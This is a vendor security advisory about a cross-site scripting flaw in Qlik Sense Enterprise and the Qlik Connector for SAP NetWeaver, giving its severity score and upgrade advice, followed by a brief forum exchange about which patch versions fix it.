Unlock a world of possibilities! Login now and discover the exclusive benefits awaiting you.
A cross-site scripting (XSS) issue, caused by improper validation of user-supplied input, has been identified in Qlik Sense Enterprise and Qlik Connector for use with SAP NetWeaver. This could lead to arbitrary JavaScript being executed in the context of a user if they visit a malicious page or link controlled by the attacker.
This issue was found as part of the Qlik secure engineering program and no reports of it being exploited have been received.
All Qlik Sense Enterprise versions prior to the versions listed below:
This vulnerability is rated as high due to the possibility of privilege escalation.
The calculated CVSS score: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N 8.2 (High)
Due to improper validation of user-supplied input, an authenticated user may be able insert arbitrary JavaScript into a page. Subsequent visitors to that page would then execute that JavaScript allowing the attacker to perform actions in the context of that user.
Recommendation
All Qlik software can be downloaded from our official Qlik Download page (customer login required)
Hello,
it looks like the XSS issue was resolved in Qlik Sense version September 2020, by upgrading the jQuery version.
There is additional work being done in the May 2021 version. Just wanted to clarify, is that related only to the Qlik Connector for use with SAP NetWeaver?
We are using the extensions. With regards to the XSS issue, if we are not using Qlik Connector for use with SAP NetWeaver, are we okay with the September 2020 version, or we have to upgrade to May 2021 version?
Thank you!
Hello @pth21 It affects Qlik Sense Enterprise and the SAP NetWeaver connector. If you're on September 2020, you should upgrade to the latest patch for September 2020. The fix for the issue is in September 2020 Patch 12 and above.